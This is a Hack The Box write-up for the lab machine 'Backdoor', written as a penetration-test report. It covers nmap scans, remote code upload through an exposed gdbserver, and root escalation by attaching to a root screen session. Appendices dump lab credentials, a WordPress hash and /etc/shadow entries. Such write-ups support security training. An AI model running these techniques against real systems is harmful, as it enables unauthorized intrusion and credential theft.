# **Hack The Box: Backdoor Report**

Box Report

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# 1 Hack The Box: Backdoor Report

2 Methodologies

I utilized a widely adopted approach to performing penetration testing that is effective in testing how

well the Backdoor machine is secured. Below is a breakout of how I was able to identify and exploit the

variety of systems and includes all individual vulnerabilities found.

2.1 Information Gathering

The information gathering portion of a penetration test focuses on identifying the scope of the pene-

tration test. During this penetration test, I was tasked with exploiting the Backdoor machine.

The specific IP address was:

• 10.10.11.125

2.2 Penetration

The penetration testing portions of the assessment focus heavily on gaining access to a variety of

systems. During this penetration test, I was able to successfully gain access to the Backdoor machine.

2.2.1 System IP: 10.10.11.125

2.2.1.1 Service Enumeration

services are alive on a system or systems. This is valuable for an attacker as it provides detailed

The service enumeration portion of a penetration test focuses on gathering information about what

information on potential attack vectors into a system. Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test. In

some cases, some ports may not be listed.

2

Server IP Address	Ports Open
10.10.11.125	<b>TCP</b> : 22,80,1337

#### **Nmap Scan Results:**

Command to run:

```
nmap -vvv -p 22,80,1337 -sC -sV -oN /HTB-boxes/backdoor/recon/nmap_init_tcp.md 10.10.11.125
```

## Output:

```
PORT
        STATE SERVICE REASON
                                   VERSION
22/tcp open ssh syn-ack
                                   OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol
   2.0)
| ssh-hostkey:
   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
   AAAAB3NzaClyc2EAAAADAQABAAABgQDqz2EAb2SBSzEIxcu+9dzgUZzDJGdCFWjwuxjhwtpq3sGiUQ1jgwf7h5BE+AlVhSX0oqoOLPKA/(
   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
| ecdsa-sha2-nistp256
   AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIuoNkiwwo7nM8ZE767bKSHJh+RbMsbItjTbVvKK4xKMfZFHzroaLE
   256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1\ZDI1NTE5AAAAIB7eoJSCw4DyNNaFftGoFcX4Ttpwf+RPo0ydNk7yfqca
       open http syn-ack
                                  Apache httpd 2.4.41 ((Ubuntu))
_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
| http-methods:
  Supported Methods: GET HEAD POST OPTIONS
1337/tcp closed waste conn-refused
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Command to run:

```
nmap -vvv -p 22,80,1337 --script vuln -oN /HTB-boxes/backdoor/recon/nmap_init_vuln.md
-> 10.10.11.125
```

### Output:

```
80/tcp open http syn-ack
| http-enum:
| /wp-login.php: Possible admin folder
| /readme.html: Wordpress version: 2
| /: WordPress version: 5.8.1
```

```
/wp-includes/images/rss.png: Wordpress version 2.2 found.
/wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
/wp-includes/images/blank.gif: Wordpress version 2.6 found.
/wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
/wp-login.php: Wordpress login page.
/wp-admin/upgrade.php: Wordpress login page.
/ readme.html: Interesting, a readme.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-wordpress-users:
| Username found: admin
|_Search stopped at ID #25. Increase the upper limit if necessary with
| 'http-wordpress-users.limit'
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server
| might not be vulnerable
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
```

## **Vulnerability Explanation:**

There exists a vulnerability in where a remote user can arbitrarily upload files to a server whilst utilizing the common gdb debugger.

## **Vulnerability Fix:**

One can disallow all traffic on the port exposed to uploads via gdb. In this case, port 1337 should be closed.

Severity: Critical

#### **Proof of Concept Code Here:**

Exploitation Reference: https://book.hacktricks.xyz/pentesting/pentesting-remote-gdbserver

Run the following commands on the attacker machine:

## Output from exploitation process:

```
GNU gdb (Debian 10.1-2) 10.1.90.20210103-git
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
   <http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from binary.elf...
(No debugging symbols found in binary.elf)
(gdb) target extended-remote 10.10.11.125:1337
Remote debugging using 10.10.11.125:1337
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
warning: File transfers from remote targets can be slow. Use "set sysroot" to access files
   locally instead.
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
Reading symbols from target:/lib64/ld-linux-x86-64.so.2...
Reading /lib64/ld-2.31.so from remote target...
Reading /lib64/.debug/ld-2.31.so from remote target...
Reading /usr/lib/debug//lib64/ld-2.31.so from remote target...
Reading /usr/lib/debug/lib64//ld-2.31.so from remote target...
Reading target:/usr/lib/debug/lib64//ld-2.31.so from remote target...
(No debugging symbols found in target:/lib64/ld-linux-x86-64.so.2)
0x00007ffff7fd0100 in ?? () from target:/lib64/ld-linux-x86-64.so.2
(gdb) remote put binary.elf binary.elf
(gdb) set remote exec-file /home/user/binary.elf
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program:
Reading /home/user/binary.elf from remote target...
Reading /home/user/binary.elf from remote target...
Reading symbols from target:/home/user/binary.elf...
(No debugging symbols found in target:/home/user/binary.elf)
[Detaching after fork from child process 25790]
[Inferior 1 (process 25773) exited normally]
```

#### Local.txt Proof Screenshot



Figure 2.1: local.txt

#### **Local.txt Contents**

6b703f8f851ed42c0e37aafdadba7854

## 2.2.1.2 Privilege Escalation

# **Vulnerability Exploited:**

Attaching to screen session of other users.

# **Vulnerability Explanation:**

A vulnerability exists where users can attach to screen session of other users, including attatching to sessions with elevated privileges.

## **Vulnerability Fix:**

Closing user screen sessions when done with, and altering privileges so that no user can attach to another user's screen session is how one can remmidiate this vulnerability.

Severity: Critical

### **Exploit Code:**

Run the following commands on the target machine:

```
SHELL=/bin/bash script -q /dev/null
export TERM=xterm
screen -x root/root
```

#### **Proof Screenshot Here:**

Figure 2.2: root.txt

#### **Proof.txt Contents:**

2630fe7ba50e8adf06523504a7686134

# 2.3 Maintaining Access

Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable. The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again. Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.

# 2.4 House Cleaning

The house cleaning portions of the assessment ensures that remnants of the penetration test are removed. Often fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road. Ensuring that we are meticulous and no remnants of our penetration test are left over is important.

After collecting trophies from the Backdoor machine was completed, I removed all user accounts, passwords, and malicious codes used during the penetration test. Hack the box should not have to remove any user accounts or services from the system.

# 3 Appendix - Additional Items

# 3.1 Appendix - Proof and Local Contents:

IP (Hostname)	Local.txt Contents	Proof.txt Contents
10.10.11.125	6b703f8f851ed42c0e37aafdadba785	542630fe7ba50e8adf06523504a7686134

# 3.2 Appendix - MYSQL Enumeration

## **MYSQL Credentials**

Found in: /var/www/data/wordpress/wp-config.php

```
username: wordpressuser
password: MQYBJSaD#DxG6qbm
```

Commands used to enumerate MYSQL service:

```
mysql -u wordpressuser -pMQYBJSaD#DxG6qbm
use wordpress;
select * from wp_users;
exit
```

Found Wordpress admin user hash:

admin::\$P\$Bt8c3ivanSGd2TFcm3HV/9ezXPueg5

# 3.3 Appendix - /etc/passwd contents

```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
user:x:1000:1000:user:/home/user:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
```

# 3.4 Appendix - /etc/shadow contents

news:\*:18659:0:99999:7:::

```
root:$6$Ge7j2m6HBATUjQ8p$nNMtfyfrLzjPvVl9Txt58qcx1Lm9jpd23z7a5q0LBuzbiUfuh4NrQtUBDHE8v6n3q17tfZJ6.f3nvgfEZS5qE
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::
sync:*:18659:0:99999:7:::
games:*:18659:0:99999:7:::
man:*:18659:0:99999:7:::
lp:*:18659:0:99999:7:::
mail:*:18659:0:99999:7:::
```

```
uucp:*:18659:0:99999:7:::
proxy:*:18659:0:99999:7:::
www-data:*:18659:0:99999:7:::
backup:*:18659:0:99999:7:::
list:*:18659:0:999999:7:::
irc:*:18659:0:99999:7:::
gnats:*:18659:0:99999:7:::
nobody:*:18659:0:99999:7:::
systemd-network:*:18659:0:99999:7:::
systemd-resolve:*:18659:0:99999:7:::
systemd-timesync:*:18659:0:99999:7:::
messagebus:*:18659:0:99999:7:::
syslog:*:18659:0:99999:7:::
_apt:*:18659:0:9999<u>9:7:::</u>
tss:*:18659:0:99999:7:::
uuidd:*:18659:0:99999:7:::
tcpdump: *:18659:0:99999:7:::
landscape:*:18659:0:99999:7:::
pollinate:*:18659:0:99999:7:::
usbmux:*:18826:0:99999:7:::
sshd:*:18826:0:99999:7:::
systemd-coredump:!!:18826:::::
user:$6$HW/ZyGUqJGqPwnDH$97Bjh8unoViZeVDy2xDn4aq8055Vevz4qEgFHwAisonfTrzacloUoRSEyr7SRVRdiQp32eh98EBo4cbN8PVf3
lxd:!:18826:::::
mysql:!:18832:0:99999:7:::
```